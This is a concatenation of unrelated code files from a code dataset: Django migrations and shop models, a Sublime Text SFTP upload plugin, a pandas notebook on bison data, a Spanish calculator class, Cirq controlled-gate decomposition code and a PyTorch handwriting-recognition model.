'verbose_name': 'серия',\n 'verbose_name_plural': 'серии',\n },\n ),\n migrations.CreateModel(\n name='Story',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('title', models.CharField(verbose_name='Название', max_length=512)),\n ('cover', models.BooleanField(verbose_name='Наличие обложки', default=False, editable=False)),\n ('date', models.DateTimeField(verbose_name='Дата публикации', auto_now_add=True)),\n ('draft', models.BooleanField(verbose_name='Черновик', default=True)),\n ('approved', models.BooleanField(verbose_name='Одобрен', default=False)),\n ('finished', models.BooleanField(verbose_name='Закончен', default=False)),\n ('freezed', models.BooleanField(verbose_name='Заморожен', default=False)),\n ('notes', models.TextField(max_length=4096, verbose_name='Заметки к рассказу', blank=True)),\n ('original', models.BooleanField(verbose_name='Оригинальный (не перевод)', default=True)),\n ('summary', models.TextField(verbose_name='Общее описание', max_length=4096)),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('vote_up_count', models.PositiveIntegerField(default=0)),\n ('vote_down_count', models.PositiveIntegerField(default=0)),\n ('vote_rating', models.FloatField(default=0)),\n ('authors', models.ManyToManyField(verbose_name='Авторы', blank=True, to=settings.AUTH_USER_MODEL, through='ponyFiction.CoAuthorsStory')),\n ('betas', models.ManyToManyField(related_name='beta_set', verbose_name='Бета-читатели', to=settings.AUTH_USER_MODEL, through='ponyFiction.BetaReading')),\n ('bookmarks', models.ManyToManyField(related_name='bookmarked_story_set', verbose_name='Отложённость', blank=True, to=settings.AUTH_USER_MODEL, through='ponyFiction.Bookmark')),\n ('categories', models.ManyToManyField(verbose_name='Жанры', to='ponyFiction.Category')),\n ('characters', models.ManyToManyField(verbose_name='Персонажи', blank=True, to='ponyFiction.Character')),\n ('classifications', models.ManyToManyField(verbose_name='События', blank=True, to='ponyFiction.Classifier')),\n ('favorites', models.ManyToManyField(related_name='favorites_story_set', verbose_name='Избранность', blank=True, to=settings.AUTH_USER_MODEL, through='ponyFiction.Favorites')),\n ('in_series', models.ManyToManyField(verbose_name='Принадлежность к серии', blank=True, to='ponyFiction.Series', through='ponyFiction.InSeriesPermissions')),\n ('rating', models.ForeignKey(null=True, verbose_name='Рейтинг', to='ponyFiction.Rating')),\n ],\n options={\n 'verbose_name': 'рассказ',\n 'verbose_name_plural': 'рассказы',\n },\n ),\n migrations.CreateModel(\n name='StoryEditLogItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('action', models.SmallIntegerField(choices=[(1, 'опубликовал'), (2, 'отправил в черновики'), (3, 'одобрил'), (4, 'отозвал'), (5, 'отредактировал')])),\n ('json_data', models.TextField(null=True)),\n ('date', models.DateTimeField(db_index=True, auto_now_add=True)),\n ('is_staff', models.BooleanField()),\n ('story', models.ForeignKey(related_name='edit_log', to='ponyFiction.Story')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='StoryView',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата просмотра', auto_now_add=True)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор 
просмотра', to=settings.AUTH_USER_MODEL)),\n ('chapter', models.ForeignKey(related_name='chapter_views_set', null=True, verbose_name='Глава рассказа', to='ponyFiction.Chapter')),\n ('story', models.ForeignKey(related_name='story_views_set', null=True, verbose_name='Рассказ', to='ponyFiction.Story')),\n ],\n options={\n 'verbose_name': 'просмотр',\n 'verbose_name_plural': 'просмотры',\n },\n ),\n migrations.CreateModel(\n name='Vote',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата голосования', auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('ip', models.GenericIPAddressField(verbose_name='IP автора', default='0.0.0.0')),\n ('plus', models.NullBooleanField(verbose_name='Плюс')),\n ('minus', models.NullBooleanField(verbose_name='Минус')),\n ('author', models.ForeignKey(null=True, verbose_name='Автор голоса', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'голос',\n 'verbose_name_plural': 'голоса',\n },\n ),\n migrations.AddField(\n model_name='story',\n name='vote',\n field=models.ManyToManyField(verbose_name='Голоса за рассказ', to='ponyFiction.Vote'),\n ),\n migrations.AddField(\n model_name='inseriespermissions',\n name='series',\n field=models.ForeignKey(null=True, verbose_name='Серия', to='ponyFiction.Series'),\n ),\n migrations.AddField(\n model_name='inseriespermissions',\n name='story',\n field=models.ForeignKey(null=True, verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='favorites',\n name='story',\n field=models.ForeignKey(related_name='favorites_story_related_set', null=True, verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='comment',\n name='story',\n field=models.ForeignKey(null=True, verbose_name='Отношение к рассказу', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='coauthorsstory',\n name='story',\n field=models.ForeignKey(verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='coauthorsseries',\n name='series',\n field=models.ForeignKey(null=True, verbose_name='Серия', to='ponyFiction.Series'),\n ),\n migrations.AddField(\n model_name='character',\n name='group',\n field=models.ForeignKey(null=True, verbose_name='Группа персонажа', to='ponyFiction.CharacterGroup'),\n ),\n migrations.AddField(\n model_name='chapter',\n name='story',\n field=models.ForeignKey(null=True, verbose_name='Отношение к рассказу', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='bookmark',\n name='story',\n field=models.ForeignKey(related_name='bookmarks_related_set', null=True, verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='betareading',\n name='story',\n field=models.ForeignKey(null=True, verbose_name='История вычитки', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='activity',\n name='story',\n field=models.ForeignKey(related_name='story_activity_set', null=True, verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AlterIndexTogether(\n name='storyeditlogitem',\n index_together=set([('story', 'date'), ('is_staff', 'date')]),\n ),\n migrations.AlterIndexTogether(\n name='story',\n index_together=set([('approved', 'draft', 'date'), ('approved', 'draft', 'vote_rating')]),\n ),\n 
]\n","repo_name":"andreymal/ponyFiction","sub_path":"ponyFiction/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":24655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"70478488889","text":"import json\nimport re\nfrom pathlib import Path, PurePosixPath\n\nimport paramiko\n\nimport sublime\nimport sublime_plugin\n\nSETTINGS = \"QuickSFTP.sublime-settings\"\nLABEL = \"quick_sftp\"\nINIT_COMMAND = LABEL + \"_init\"\nUPLOAD_COMMAND = LABEL + \"_upload\"\n\nDEFAULTS = {\n \"name\": None,\n \"username\": None,\n \"password\": None,\n \"knownHostsPath\": None,\n \"privateKeyPath\": None,\n \"host\": None,\n \"port\": 22,\n \"remotePath\": None,\n \"connectTimeout\": 5,\n \"directoryPermissions\": \"755\",\n \"filePermissions\": \"644\",\n \"uploadOnSave\": False,\n \"ignore\": [],\n}\n\n\ndef pp(text, label=None, exit_=False):\n \"Simple pretty print for debugging\"\n from pprint import pprint\n\n if label:\n print((\"# DEBUG: {}\".format(label)))\n pprint(text)\n\n if exit_:\n pass\n\n\ndef debug(text):\n if sublime.load_settings(SETTINGS).get(\"debug\"):\n print(\"SFTP: \" + text)\n\n\nclass SftpException(Exception):\n pass\n\n\nclass Connection(object):\n def __init__(self, settings):\n self.settings = settings\n self.reset()\n\n def reset(self):\n self.client = None\n self.connection = None\n self.pkey = None\n\n def upload(self, src, dst):\n if self.connection is not None:\n try:\n transport = self.client.get_transport()\n transport.send_ignore()\n except EOFError as e:\n debug(\"Connection reset ({})\".format())\n self.reset()\n\n if self.connection is None:\n self.client = paramiko.SSHClient()\n\n if self.settings[\"knownHostsPath\"] is not None:\n self.client.load_host_keys(self.settings[\"knownHostsPath\"])\n else:\n self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n if self.settings[\"privateKeyPath\"] is not None:\n self.pkey = paramiko.RSAKey.from_private_key_file(self.settings[\"privateKeyPath\"])\n\n self.client.connect(\n self.settings[\"host\"],\n port=self.settings[\"port\"],\n username=self.settings[\"username\"],\n password=self.settings[\"password\"],\n pkey=self.pkey,\n timeout=self.settings[\"connectTimeout\"],\n )\n\n self.connection = self.client.open_sftp()\n debug(\"New connection open ({})\".format(self.settings[\"name\"]))\n else:\n debug(\"Connection reused ({})\".format(self.settings[\"name\"]))\n\n try:\n self.connection.put(str(src), str(dst))\n except FileNotFoundError:\n dst_path = dst.relative_to(self.settings[\"remotePath\"])\n for parent in list(reversed(dst_path.parents))[1:]:\n p = \"{}/{}\".format(self.settings[\"remotePath\"], parent)\n try:\n self.connection.listdir(p)\n except FileNotFoundError:\n self.connection.mkdir(p)\n if self.settings[\"directoryPermissions\"] is not None:\n self.connection.chmod(p, int(self.settings[\"directoryPermissions\"], 8))\n\n self.connection.put(str(src), str(dst))\n\n if self.settings[\"filePermissions\"] is not None:\n self.connection.chmod(str(dst), int(self.settings[\"filePermissions\"], 8))\n\n debug(\"{} → {}\".format(src.relative_to(self.settings[\"projectPath\"]), dst))\n\n return True\n\n\nclass Repository(object):\n connections = {}\n\n def __init__(self, name):\n if not name:\n raise SftpException(\"Field 'name' is missing in sftp.json\")\n\n self.name = name\n\n def init(self, user_settings):\n settings = DEFAULTS.copy()\n settings.update(user_settings)\n\n for key in [\"username\", 
\"host\", \"remotePath\"]:\n if not settings[key]:\n raise SftpException(\"Field '{}' is required\".format(key))\n\n self.connections[self.name] = Connection(settings)\n\n return settings\n\n def get_connection(self):\n return self.connections[self.name]\n\n def get_project_path(self):\n return self.connections[self.name].settings[\"projectPath\"]\n\n def get_remote_path(self):\n return self.connections[self.name].settings[\"remotePath\"]\n\n\nclass QuickSftpUploadCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n try:\n file_name = Path(self.view.file_name())\n except TypeError:\n self.view.erase_status(LABEL)\n return False\n\n try:\n name = self.view.settings().get(LABEL)[\"name\"]\n except TypeError:\n return False\n\n try:\n repository = Repository(name)\n try:\n connection = repository.get_connection()\n except KeyError:\n self.view.run_command(INIT_COMMAND)\n try:\n connection = repository.get_connection()\n except KeyError:\n raise SftpException(\"Init failed\")\n\n connection = repository.get_connection()\n project_path = connection.settings[\"projectPath\"]\n remote_path = PurePosixPath(connection.settings[\"remotePath\"])\n\n src = file_name\n relativeSrc = PurePosixPath(src.relative_to(project_path))\n\n for pattern in connection.settings[\"ignore\"]:\n if re.search(pattern, str(relativeSrc)):\n debug(\"Ignored file {}\".format(relativeSrc))\n return\n\n dst = remote_path / relativeSrc\n\n connection.upload(src, dst)\n except Exception as ex:\n self.view.set_status(LABEL, \"SFTP: {}\".format(str(ex)))\n raise\n else:\n self.view.set_status(LABEL, \"done {}\".format(file_name.name))\n sublime.set_timeout(lambda: self.view.set_status(LABEL, \"SFTP\"), 3000)\n\n\nclass QuickSftpInitCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n try:\n file_name = Path(self.view.file_name())\n except TypeError:\n self.view.erase_status(LABEL)\n return False\n\n for dir in file_name.parents:\n json_path = dir / \".sublime\" / \"sftp.json\"\n if json_path.exists():\n debug(\"Found settings in {}\".format(json_path))\n with json_path.open() as fp:\n try:\n settings = json.load(fp)\n if \"name\" not in settings:\n raise ValueError(\"Field 'name' is missing in sftp.json\")\n except ValueError as ex:\n self.view.set_status(LABEL, \"SFTP: {}\".format(str(ex)))\n raise\n\n settings[\"projectPath\"] = dir\n\n repository = Repository(settings[\"name\"])\n settings = repository.init(settings)\n\n self.view.settings().set(\n LABEL, {\"name\": settings[\"name\"], \"uploadOnSave\": settings[\"uploadOnSave\"]}\n )\n self.view.set_status(LABEL, \"SFTP\")\n\n break\n\n\nclass QuickSftpEventListener(sublime_plugin.EventListener):\n def on_load_async(self, view):\n if not view.settings().has(LABEL):\n view.run_command(INIT_COMMAND)\n\n def on_pre_save_async(self, view):\n if view.settings().has(LABEL) and view.file_name() is not None:\n if view.settings().get(LABEL)[\"uploadOnSave\"] is True:\n view.set_status(LABEL, \"local → remote {}\".format(Path(view.file_name()).name))\n\n def on_post_save_async(self, view):\n if view.settings().has(LABEL):\n if view.settings().get(LABEL)[\"uploadOnSave\"] is True:\n view.run_command(UPLOAD_COMMAND)\n","repo_name":"dabekf/QuickSFTP","sub_path":"QuickSFTP.py","file_name":"QuickSFTP.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23038862120","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n#Here is how I import pandas into Jupyter 
notebook\nimport pandas as pd\n\n\n# In[3]:\n\n\n#This is how you make the dataset actually usable for commands\nbison = pd.read_csv('/Users/wario5551/Downloads/BisonTracking.csv')\n\n\n# In[23]:\n\n\n#This is how I found the top 7 rows in the dataset\nbison.head(7)\n\n\n# In[6]:\n\n\n#This is how I found the last 10 rows in the dataset\nbison.tail(10)\n\n\n# In[8]:\n\n\n#This shows how many columns are in the dataset\nlen(bison.columns)\n\n\n# In[9]:\n\n\n#This shows how many rows are in the dataset\nlen(bison)\n\n\n# In[12]:\n\n\n#This is the standard deviation of length\nbison.Length.std()\n\n\n# In[13]:\n\n\n#This is the mean of length\nbison.Length.mean()\n\n\n# In[20]:\n\n\n#This command shows how many of each bison species is mentioned, there are\n#a total of 633 that are antiquus\nbison.Species.value_counts()\n\n\n# In[21]:\n\n\n#This is the median of length\nbison.Length.median()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Wario5551/Lesson-8-Hands-On","sub_path":"lesson_eight_handson.py","file_name":"lesson_eight_handson.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5994500255","text":"from typing import List\n\nimport pytorch_lightning as pl\nimport torch\nimport random\nfrom torch import FloatTensor, LongTensor\n\nfrom bttr.utils import Hypothesis\nfrom einops.einops import rearrange\n\nfrom .decoder import Decoder\nfrom .encoder import Encoder\nfrom .encoderT import EncoderT\nfrom .labelimg import Up\n\nclass BTTR(pl.LightningModule):\n    def __init__(\n        self,\n        d_model: int,\n        growth_rate: int,\n        num_layers: int,\n        nhead: int,\n        num_decoder_layers: int,\n        dim_feedforward: int,\n        dropout: float,\n    ):\n        super().__init__()\n\n        self.encoder = Encoder(\n            d_model=d_model, growth_rate=growth_rate, num_layers=num_layers\n        )\n        self.encoderT = EncoderT(d_model=d_model, nhead=nhead, d_hid=dim_feedforward, nlayers=num_layers)\n        self.decoder = Decoder(\n            d_model=d_model,\n            nhead=nhead,\n            num_decoder_layers=num_decoder_layers,\n            dim_feedforward=dim_feedforward,\n            dropout=dropout,\n        )\n        self.up = Up(in_channels=d_model)\n\n    def forward(\n        self, img: FloatTensor, img_mask: LongTensor, tgt: LongTensor, outinput: LongTensor\n    ) -> FloatTensor:\n        \"\"\"run img and bi-tgt\n\n        Parameters\n        ----------\n        img : FloatTensor\n            [b, 1, h, w]\n        img_mask: LongTensor\n            [b, h, w]\n        tgt : LongTensor\n            [2b, l]\n\n        Returns\n        -------\n        FloatTensor\n            [2b, l, vocab_size]\n        \"\"\"\n        feature1, mask = self.encoder(img, img_mask)  # [b, t, d]\n        feature = rearrange(feature1, \"b h w d -> b (h w) d\")\n        mask = rearrange(mask, \"b h w -> b (h w)\")\n        # # bidirectional: duplicate the image features to match the doubled tgt\n        feature = torch.cat((feature, feature), dim=0)  # [2b, t, d]\n        mask = torch.cat((mask, mask), dim=0)\n        # text features; note: encoded from tgt, which has already gone through l2r + r2l, size = [2b, l, d]\n        featureT = self.encoderT(outinput)\n        maskT = (outinput == 0)\n        featureT = torch.cat((featureT, featureT), dim=0)  # [2b, t, d]\n        maskT = torch.cat((maskT, maskT), dim=0)\n        # fuse the text and image encodings\n        feature = torch.cat((feature, featureT), dim=1)\n        mask = torch.cat((mask, maskT), dim=1)\n        \n        out = self.decoder(feature, mask, tgt)\n        feature2 = rearrange(feature1,\"b h w d -> b d h w\")\n        reimg = self.up(feature2)\n        # img = self.GetImage(feature, mask, tgt)\n        return out, reimg\n\n    def beam_search(\n        self, img: FloatTensor, img_mask: LongTensor, beam_size: int, max_len: int\n    ) -> List[Hypothesis]:\n        \"\"\"run bi-direction beam search for given img\n\n        Parameters\n        ----------\n        img : FloatTensor\n            [1, 1, 
h', w']\n img_mask: LongTensor\n [1, h', w']\n beam_size : int\n max_len : int\n\n Returns\n -------\n List[Hypothesis]\n \"\"\"\n feature, mask = self.encoder(img, img_mask) # [1, t, d]\n feature = rearrange(feature, \"b h w d -> b (h w) d\")\n mask = rearrange(mask, \"b h w -> b (h w)\")\n return self.decoder.beam_search(feature, mask, beam_size, max_len)\n","repo_name":"ToxicYP/XInput","sub_path":"bttr/model/bttr.py","file_name":"bttr.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19334143010","text":"class operar():\n\n def __init__(self):\n self.valor1 = 0\n self.valor2 = 0\n self.resultado = 0\n\n def cargar1(self):\n self.valor1 = int(input(\"Ingrese un valor: \"))\n\n def cargar2(self):\n self.valor2 = int(input(\"Ingrese otro valor: \"))\n\n def operar(self):\n pass\n\n def mostrar_resultado(self):\n print(\"El resultado es: \", self.resultado)\n\nclass suma(operar):\n\n def operar(self):\n self.resultado = self.valor1 + self.valor2\n\nclass resta(operar):\n\n def operar(self):\n self.resultado = self.valor1 - self.valor2\n\nclass division(operar):\n\n def operar(self):\n self.resultado = self.valor1 / self.valor2\n\nclass multiplicacion(operar):\n\n def operar(self):\n self.resultado = self.valor1 * self.valor2\n\nsuma1 = suma()\nsuma1.cargar1()\nsuma1.cargar2()\nsuma1.operar()\nsuma1.mostrar_resultado()\nprint(\"\")\n\nresta1= resta()\nresta1.cargar1()\nresta1.cargar2()\nresta1.operar()\nresta1.mostrar_resultado()\nprint(\"\")\n\ndivision1 = division()\ndivision1.cargar1()\ndivision1.cargar2()\ndivision1.operar()\ndivision1.mostrar_resultado()\nprint(\"\")\n\nmultiplicacion1 = multiplicacion()\nmultiplicacion1.cargar1()\nmultiplicacion1.cargar2()\nmultiplicacion1.operar()\nmultiplicacion1.mostrar_resultado()","repo_name":"Emrys2023/Primer-proyecto","sub_path":"7-7.py","file_name":"7-7.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22177766156","text":"from typing import List, Tuple, TYPE_CHECKING\n\nimport numpy as np\n\nfrom cirq import ops\nfrom cirq.linalg import is_unitary, is_special_unitary, map_eigenvalues\nfrom cirq.protocols import unitary\n\nif TYPE_CHECKING:\n import cirq\n\n\ndef _unitary_power(matrix: np.ndarray, power: float) -> np.ndarray:\n return map_eigenvalues(matrix, lambda e: e**power)\n\n\ndef _is_identity(matrix):\n \"\"\"Checks whether M is identity.\"\"\"\n return np.allclose(matrix, np.eye(matrix.shape[0]))\n\n\ndef _flatten(x):\n return sum(x, [])\n\n\ndef _decompose_abc(matrix: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray, float]:\n \"\"\"Decomposes 2x2 unitary matrix.\n\n Returns 2x2 special unitary matrices A, B, C and phase delta, such that:\n * ABC = I.\n * AXBXC * exp(1j*delta) = matrix.\n\n See [1], chapter 4.\n \"\"\"\n assert matrix.shape == (2, 2)\n delta = np.angle(np.linalg.det(matrix)) * 0.5\n alpha = np.angle(matrix[0, 0]) + np.angle(matrix[0, 1]) - 2 * delta\n beta = np.angle(matrix[0, 0]) - np.angle(matrix[0, 1])\n\n m00_abs = np.abs(matrix[0, 0])\n if np.abs(m00_abs - 1.0) < 1e-9:\n m00_abs = 1\n theta = 2 * np.arccos(m00_abs)\n\n a = unitary(ops.rz(-alpha)) @ unitary(ops.ry(-theta / 2))\n b = unitary(ops.ry(theta / 2)) @ unitary(ops.rz((alpha + beta) / 2))\n c = unitary(ops.rz((alpha - beta) / 2))\n\n x = unitary(ops.X)\n assert np.allclose(a @ b @ c, np.eye(2), atol=1e-2)\n assert np.allclose((a @ x @ b @ x @ 
c) * np.exp(1j * delta), matrix, atol=1e-2)\n\n    return a, b, c, delta\n\n\ndef _decompose_single_ctrl(\n    matrix: np.ndarray, control: 'cirq.Qid', target: 'cirq.Qid'\n) -> List['cirq.Operation']:\n    \"\"\"Decomposes controlled gate with one control.\n\n    See [1], chapter 5.1.\n    \"\"\"\n    a, b, c, delta = _decompose_abc(matrix)\n\n    result = [\n        ops.ZPowGate(exponent=delta / np.pi).on(control),\n        ops.MatrixGate(c).on(target),\n        ops.CNOT.on(control, target),\n        ops.MatrixGate(b).on(target),\n        ops.CNOT.on(control, target),\n        ops.MatrixGate(a).on(target),\n    ]\n\n    # Remove no-ops.\n    result = [g for g in result if not _is_identity(unitary(g))]\n\n    return result\n\n\ndef _ccnot_congruent(c0: 'cirq.Qid', c1: 'cirq.Qid', target: 'cirq.Qid') -> List['cirq.Operation']:\n    \"\"\"Implements 3-qubit gate 'congruent' to CCNOT.\n\n    Returns sequence of operations which is equivalent to applying\n    CCNOT(c0, c1, target) and multiplying phase of |101> state by -1.\n    See lemma 6.2 in [1].\"\"\"\n    return [\n        ops.ry(-np.pi / 4).on(target),\n        ops.CNOT(c1, target),\n        ops.ry(-np.pi / 4).on(target),\n        ops.CNOT(c0, target),\n        ops.ry(np.pi / 4).on(target),\n        ops.CNOT(c1, target),\n        ops.ry(np.pi / 4).on(target),\n    ]\n\n\ndef decompose_multi_controlled_x(\n    controls: List['cirq.Qid'], target: 'cirq.Qid', free_qubits: List['cirq.Qid']\n) -> List['cirq.Operation']:\n    \"\"\"Implements action of multi-controlled Pauli X gate.\n\n    Result is guaranteed to consist exclusively of 1-qubit, CNOT and CCNOT\n    gates.\n    If `free_qubits` has at least 1 element, result has length\n    O(len(controls)).\n\n    Args:\n        controls - control qubits.\n        target - target qubit.\n        free_qubits - qubits which are neither controlled nor target. Can be\n            modified by algorithm, but will end up in their initial state.\n    \"\"\"\n    m = len(controls)\n    if m == 0:\n        return [ops.X.on(target)]\n    elif m == 1:\n        return [ops.CNOT.on(controls[0], target)]\n    elif m == 2:\n        return [ops.CCNOT.on(controls[0], controls[1], target)]\n\n    m = len(controls)\n    n = m + 1 + len(free_qubits)\n    if (n >= 2 * m - 1) and (m >= 3):\n        # See [1], Lemma 7.2.\n        gates1 = [\n            _ccnot_congruent(controls[m - 2 - i], free_qubits[m - 4 - i], free_qubits[m - 3 - i])\n            for i in range(m - 3)\n        ]\n        gates2 = _ccnot_congruent(controls[0], controls[1], free_qubits[0])\n        gates3 = _flatten(gates1) + gates2 + _flatten(gates1[::-1])\n        first_ccnot = ops.CCNOT(controls[m - 1], free_qubits[m - 3], target)\n        return [first_ccnot, *gates3, first_ccnot, *gates3]\n    elif len(free_qubits) >= 1:\n        # See [1], Lemma 7.3.\n        m1 = n // 2\n        free1 = controls[m1:] + [target] + free_qubits[1:]\n        ctrl1 = controls[:m1]\n        part1 = decompose_multi_controlled_x(ctrl1, free_qubits[0], free1)\n        free2 = controls[:m1] + free_qubits[1:]\n        ctrl2 = controls[m1:] + [free_qubits[0]]\n        part2 = decompose_multi_controlled_x(ctrl2, target, free2)\n        return [*part1, *part2, *part1, *part2]\n    else:\n        # No free qubits - must use general algorithm.\n        # This will never happen if called from main algorithm and is added\n        # only for completeness.\n        return decompose_multi_controlled_rotation(unitary(ops.X), controls, target)\n\n\ndef _decompose_su(\n    matrix: np.ndarray, controls: List['cirq.Qid'], target: 'cirq.Qid'\n) -> List['cirq.Operation']:\n    \"\"\"Decomposes controlled special unitary gate into elementary gates.\n\n    Result has O(len(controls)) operations.\n    See [1], lemma 7.9.\n    \"\"\"\n    assert matrix.shape == (2, 2)\n    assert is_special_unitary(matrix)\n    assert len(controls) >= 1\n\n    a, b, c, _ = _decompose_abc(matrix)\n\n    cnots = decompose_multi_controlled_x(controls[:-1], target, [controls[-1]])
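\n    # The sequence below is the A-X-B-X-C sandwich of [1], lemma 7.9:\n    # controlled-C, the multi-controlled X, controlled-B, X again, controlled-A.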
\n    return [\n        *_decompose_single_ctrl(c, controls[-1], target),\n        *cnots,\n        *_decompose_single_ctrl(b, controls[-1], target),\n        *cnots,\n        *_decompose_single_ctrl(a, controls[-1], target),\n    ]\n\n\ndef _decompose_recursive(\n    matrix: np.ndarray,\n    power: float,\n    controls: List['cirq.Qid'],\n    target: 'cirq.Qid',\n    free_qubits: List['cirq.Qid'],\n) -> List['cirq.Operation']:\n    \"\"\"Decomposes controlled unitary gate into elementary gates.\n\n    Result has O(len(controls)^2) operations.\n    See [1], lemma 7.5.\n    \"\"\"\n    if len(controls) == 1:\n        return _decompose_single_ctrl(_unitary_power(matrix, power), controls[0], target)\n\n    cnots = decompose_multi_controlled_x(controls[:-1], controls[-1], free_qubits + [target])\n    return [\n        *_decompose_single_ctrl(_unitary_power(matrix, 0.5 * power), controls[-1], target),\n        *cnots,\n        *_decompose_single_ctrl(_unitary_power(matrix, -0.5 * power), controls[-1], target),\n        *cnots,\n        *_decompose_recursive(\n            matrix, 0.5 * power, controls[:-1], target, [controls[-1]] + free_qubits\n        ),\n    ]\n\n\ndef decompose_multi_controlled_rotation(\n    matrix: np.ndarray, controls: List['cirq.Qid'], target: 'cirq.Qid'\n) -> List['cirq.Operation']:\n    \"\"\"Implements action of multi-controlled unitary gate.\n\n    Returns a sequence of operations, which is equivalent to applying\n    single-qubit gate with matrix `matrix` on `target`, controlled by\n    `controls`.\n\n    Result is guaranteed to consist exclusively of 1-qubit, CNOT and CCNOT\n    gates.\n\n    If matrix is special unitary, result has length `O(len(controls))`.\n    Otherwise result has length `O(len(controls)**2)`.\n\n    References:\n        [1] Barenco, Bennett et al.\n            Elementary gates for quantum computation. 1995.\n            https://arxiv.org/pdf/quant-ph/9503016.pdf\n\n    Args:\n        matrix - 2x2 numpy unitary matrix (of real or complex dtype).\n        controls - control qubits.\n        target - target qubit.\n\n    Returns:\n        A list of operations which, applied in a sequence, are equivalent to\n        applying `MatrixGate(matrix).on(target).controlled_by(*controls)`.\n    \"\"\"\n    assert is_unitary(matrix)\n    assert matrix.shape == (2, 2)\n\n    if len(controls) == 0:\n        return [ops.MatrixGate(matrix).on(target)]\n    elif len(controls) == 1:\n        return _decompose_single_ctrl(matrix, controls[0], target)\n    elif is_special_unitary(matrix):\n        return _decompose_su(matrix, controls, target)\n    else:\n        return _decompose_recursive(matrix, 1.0, controls, target, [])\n","repo_name":"quantumlib/Cirq","sub_path":"cirq-core/cirq/transformers/analytical_decompositions/controlled_gate_decomposition.py","file_name":"controlled_gate_decomposition.py","file_ext":"py","file_size_in_byte":7969,"program_lang":"python","lang":"en","doc_type":"code","stars":3974,"dataset":"github-code","pt":"77"} +{"seq_id":"20339393249","text":"# Compute the average grade\n\ndef gerarMedia():\n    lista = []\n    for i in range(3):\n        nota = float(input('Informe a nota: '))\n        lista.append(nota)\n    media = sum(lista) / len(lista)\n    print(f'Média final: {media}')\n\ngerarMedia()\n","repo_name":"MPaulino1/activitiesPython","sub_path":"list_1.py","file_name":"list_1.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39268040996","text":"from django.db import models\nfrom django.forms import ModelForm, TextInput\nfrom core.models import Product\nfrom account.models import UserRegistration\n\nSTATUS = (\n    ('In Progress', 'In Progress'),\n    ('Canceled', 'Canceled'),\n    ('Delayed', 
'Delayed'),\n ('Delivered', 'Delivered'),\n)\n\n\nclass ShopCart(models.Model):\n user_id = models.ForeignKey(\n UserRegistration, on_delete=models.SET_NULL, null=True)\n product_cart = models.ForeignKey(\n Product, on_delete=models.SET_NULL, null=True)\n quantity = models.IntegerField()\n create_at = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n Gender_Choiced = models.CharField(max_length=250, blank=True, null=True)\n color_Choiced = models.CharField(max_length=250, blank=True, null=True)\n size_Choiced = models.CharField(max_length=250, blank=True, null=True)\n\n def __str__(self):\n return self.product_cart.name\n\n @property\n def price(self):\n return (self.product_cart.price)\n\n @property\n def amount(self):\n subtotal = 0\n if self.product_cart.discount_price:\n subtotal = self.product_cart.discount_price * self.quantity\n else:\n subtotal = self.price * self.quantity\n\n return subtotal\n\n\nclass Order(models.Model):\n\n user = models.ForeignKey(UserRegistration, on_delete=models.CASCADE)\n first_name = models.CharField(max_length=20)\n last_name = models.CharField(max_length=30)\n email = models.CharField(max_length=80, blank=True)\n phone = models.CharField(max_length=15)\n address = models.CharField(max_length=150)\n city = models.CharField(max_length=40)\n zip_code = models.CharField(max_length=8, blank=True)\n total = models.FloatField()\n note = models.TextField(null=True, default=\"\", blank=True)\n status = models.CharField(\n choices=STATUS, default='In Progress', max_length=15)\n create_at = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.user.username + ' - ' + str(self.total)\n\n\nclass OrderDetail(models.Model):\n\n order = models.ForeignKey(Order, on_delete=models.CASCADE)\n user = models.ForeignKey(UserRegistration, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n quantity = models.IntegerField()\n price = models.FloatField()\n total = models.FloatField()\n deliver_time = models.DateField()\n 